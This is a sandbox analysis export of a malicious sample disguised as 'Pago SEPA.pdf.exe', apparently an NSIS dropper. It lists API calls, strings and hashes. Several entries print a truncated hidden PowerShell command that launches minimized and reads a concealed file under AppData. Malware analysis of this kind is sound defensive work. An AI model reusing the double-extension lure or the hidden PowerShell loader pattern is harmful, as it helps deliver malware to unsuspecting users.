                                                                      • ShowWindow.USER32(00000000), ref: 004054B6
                                                                      • ShowWindow.USER32(?,00000008), ref: 004054BB
                                                                      • ShowWindow.USER32(00000008), ref: 00405505
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405539
                                                                      • CreatePopupMenu.USER32 ref: 0040554A
                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040555E
                                                                      • GetWindowRect.USER32(?,?), ref: 0040557E
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405597
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CF
                                                                      • OpenClipboard.USER32(00000000), ref: 004055DF
                                                                      • EmptyClipboard.USER32 ref: 004055E5
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055F1
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004055FB
                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560F
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562F
                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 0040563A
                                                                      • CloseClipboard.USER32 ref: 00405640
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: {
                                                                      • API String ID: 590372296-366298937
                                                                      • Opcode ID: da2ca2b418a71cb7626a400892366c561e1cdf4532a0086df1c8728d7d787aa1
                                                                      • Instruction ID: 3cf410e3b9716a944c4f9a47a0d896a4f96f7db2f8ccf501d1eae2c46102dad2
                                                                      • Opcode Fuzzy Hash: da2ca2b418a71cb7626a400892366c561e1cdf4532a0086df1c8728d7d787aa1
                                                                      • Instruction Fuzzy Hash: 85B13A71900208FFDB21AF60DD85AAE7B79FB44355F40803AFA01BA1A0C7755E52DF69

                                                                      Control-flow Graph (rendered graph image omitted; block edges not reproduced)
                                                                      APIs
                                                                      • GetVersion.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,?,004051B5,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,00000000,0040FEC0), ref: 00406104
                                                                      • GetSystemDirectoryW.KERNEL32(004271C0,00000400), ref: 00406182
                                                                      • GetWindowsDirectoryW.KERNEL32(004271C0,00000400), ref: 00406195
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061D1
                                                                      • SHGetPathFromIDListW.SHELL32(?,004271C0), ref: 004061DF
                                                                      • CoTaskMemFree.OLE32(?), ref: 004061EA
                                                                      • lstrcatW.KERNEL32(004271C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040620E
                                                                      • lstrlenW.KERNEL32(004271C0,00000000,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,?,004051B5,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,00000000,0040FEC0), ref: 00406268
                                                                      Strings
                                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406208
                                                                      • C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\, xrefs: 00406066
                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406150
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-757189474
                                                                      • Opcode ID: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                      • Instruction ID: fd30239bcabdd6b9b5dacf38e9278243e7343c89492a0aeb8152419411716c6f
                                                                      • Opcode Fuzzy Hash: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                      • Instruction Fuzzy Hash: 70614771A00101ABDF209F64CC40AAE37A5AF51314F12817FE916BA2D1D73D89A2CB5E

                                                                      Control-flow Graph (rendered graph image omitted; block edges not reproduced)
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405839
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 00405881
                                                                      • lstrcatW.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004058A4
                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004058AA
                                                                      • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004058BA
                                                                      • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,00409300,0000002E), ref: 0040595A
                                                                      • FindClose.KERNELBASE(00000000), ref: 00405969
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\*.*$\*.*
                                                                      • API String ID: 2035342205-1325715082
                                                                      • Opcode ID: 4fb6421756a88129fd8c5299e0ee644403a5a953871eba58af647f09c9a40e4d
                                                                      • Instruction ID: d8405d9d0b65c0b5bb91e26b2d86fa163654aae1973f92c1c3fedea70a861e09
                                                                      • Opcode Fuzzy Hash: 4fb6421756a88129fd8c5299e0ee644403a5a953871eba58af647f09c9a40e4d
                                                                      • Instruction Fuzzy Hash: EA41F271800A18FACB21BB658C49BBF7A78EB81365F10817BF805711D1C77C4D919EAE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                      • Instruction ID: 25739d06ab219284b51534763859987154442e2999ed31f69dfe775b8bf1d6bb
                                                                      • Opcode Fuzzy Hash: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                      • Instruction Fuzzy Hash: 09F17671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(75923420,00425758,00424F10,00405B24,00424F10,00424F10,00000000,00424F10,00424F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405830,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040636D
                                                                      • FindClose.KERNEL32(00000000), ref: 00406379
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: XWB
                                                                      • API String ID: 2295610775-4039527733
                                                                      • Opcode ID: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                      • Instruction ID: b60ab41fd2821b41d0b392bba1ac2053f61c2dcbfada57179e30504603363e2d
                                                                      • Opcode Fuzzy Hash: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                      • Instruction Fuzzy Hash: BBD0123194C1209FD3401778BD0C88B7B989B553317214B72FD2AF23E0C3388C6586D9

                                                                      Control-flow Graph (function starting at 00403C0B; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C47
                                                                      • ShowWindow.USER32(?), ref: 00403C64
                                                                      • DestroyWindow.USER32 ref: 00403C78
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C94
                                                                      • GetDlgItem.USER32(?,?), ref: 00403CB5
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC9
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CD0
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403D7E
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D88
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403DA2
                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DF3
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E99
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EBA
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECC
                                                                      • EnableWindow.USER32(?,?), ref: 00403EE7
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403EFD
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403F04
                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F1C
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2F
                                                                      • lstrlenW.KERNEL32(00422708,?,00422708,00428220), ref: 00403F58
                                                                      • SetWindowTextW.USER32(?,00422708), ref: 00403F6C
                                                                      • ShowWindow.USER32(?,0000000A), ref: 004040A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3282139019-0
                                                                      • Opcode ID: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                      • Instruction ID: 61cac7681639d4f9e887145b94be1570fe16d39d0a036e069046cfcd2a92ab20
                                                                      • Opcode Fuzzy Hash: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                      • Instruction Fuzzy Hash: 3BC1C071A04200BBDB316F61ED84E2B3AACEB95705F50053EF601B11F1CB799992DB6E

                                                                      Control-flow Graph (function starting at 00403868; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                        • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                        • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422
                                                                      • lstrcatW.KERNEL32(1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe"), ref: 004038E9
                                                                      • lstrlenW.KERNEL32(004271C0,?,?,?,004271C0,00000000,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,75923420), ref: 00403969
                                                                      • lstrcmpiW.KERNEL32(004271B8,.exe,004271C0,?,?,?,004271C0,00000000,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000), ref: 0040397C
                                                                      • GetFileAttributesW.KERNEL32(004271C0), ref: 00403987
                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers), ref: 004039D0
                                                                        • Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73
                                                                      • RegisterClassW.USER32(004281C0), ref: 00403A0D
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A25
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A5A
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A90
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281C0), ref: 00403ABC
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281C0), ref: 00403AC9
                                                                      • RegisterClassW.USER32(004281C0), ref: 00403AD2
                                                                      • DialogBoxParamW.USER32(?,00000000,00403C0B,00000000), ref: 00403AF1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: Completed$"C:\Users\user\Desktop\Pago SEPA.pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 1975747703-1217110142
                                                                      • Opcode ID: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                      • Instruction ID: 2be98759588b12f3ea5babf1b6ec1a1322f2c31473ef1d4f92accd895ea03b39
                                                                      • Opcode Fuzzy Hash: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                      • Instruction Fuzzy Hash: C861A670644200BAD220AF669D45F3B3A6CEB84749F80457FF941B22E2CB7C6D01CA7E

                                                                      Control-flow Graph (function starting at 00402DEE; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Pago SEPA.pdf.exe,00000400,?,?,00000000,00403504,?), ref: 00402E1B
                                                                        • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                        • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Pago SEPA.pdf.exe,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00402E67
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Pago SEPA.pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                      • API String ID: 4283519449-3959948815
                                                                      • Opcode ID: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
                                                                      • Instruction ID: cad0cac5a7d3da6b721da94722abfb33afad8597fd9771d3107dd1117b6c1d4f
                                                                      • Opcode Fuzzy Hash: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
                                                                      • Instruction Fuzzy Hash: EA51D471901216ABDB209F64DE89B9E7BB8EB04354F20407BF904F62D1C7BC9D419BAD

                                                                      Control-flow Graph

                                                                      • Function entry 401767 (rendered block graph with Executed / Not Executed colouring not reproduced)
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,?,?,00000031), ref: 004017A8
                                                                      • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,00000000,00000000,"powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen,C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers,?,?,00000031), ref: 004017CD
                                                                        • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                        • Part of subcall function 0040517E: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                        • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                        • Part of subcall function 0040517E: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00403160,00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000), ref: 004051D9
                                                                        • Part of subcall function 0040517E: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\), ref: 004051EB
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                        • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen$C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers$C:\Users\user\AppData\Roaming\Egetrets105.met
                                                                      • API String ID: 1941528284-3704653189
                                                                      • Opcode ID: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
                                                                      • Instruction ID: e39dfb19bb2720adffc224853af95c022162de9bd11196ce21bc9617d3384428
                                                                      • Opcode Fuzzy Hash: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
                                                                      • Instruction Fuzzy Hash: 9041D571900515BACF20BFB5CC45DAF3679EF45328B20427BF422B50E2DB3C8A519A6D

                                                                      Control-flow Graph

                                                                      • Function entry 40517e (rendered block graph with Executed / Not Executed colouring not reproduced)
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                      • lstrlenW.KERNEL32(00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00403160,00403160,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,00000000,0040FEC0,00000000), ref: 004051D9
                                                                      • SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\,C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\), ref: 004051EB
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjF5E.tmp\
                                                                      • API String ID: 2531174081-2318496318
                                                                      • Opcode ID: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                      • Instruction ID: 21bddbe199db3e121897d5596c22f00b0e76f5ccd37bc28327e30b1938552548
                                                                      • Opcode Fuzzy Hash: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                      • Instruction Fuzzy Hash: 9E219D71900118BACB219FA5DD84ACFBFB9EF58350F14807AF904B62A0C7798A41CF68

                                                                      Control-flow Graph

                                                                      • Function entry 403027 (rendered block graph with Executed / Not Executed colouring not reproduced)
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134
                                                                      • Opcode ID: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
                                                                      • Instruction ID: dc339ecebd5a12fc0f5e273b782e0acc65c92b35cb5ec2ffb99f959b3dc2fe49
                                                                      • Opcode Fuzzy Hash: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
                                                                      • Instruction Fuzzy Hash: CC517A71900219ABDB10DF65D904B9F3FA8AF04766F14427BF911BB2C5C7789E408BE9

                                                                      Control-flow Graph

                                                                      • Function entry 40564d (rendered block graph with Executed / Not Executed colouring not reproduced)
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
                                                                      • GetLastError.KERNEL32 ref: 004056A4
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B9
                                                                      • GetLastError.KERNEL32 ref: 004056C3
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405673
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3449924974-823278215
                                                                      • Opcode ID: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
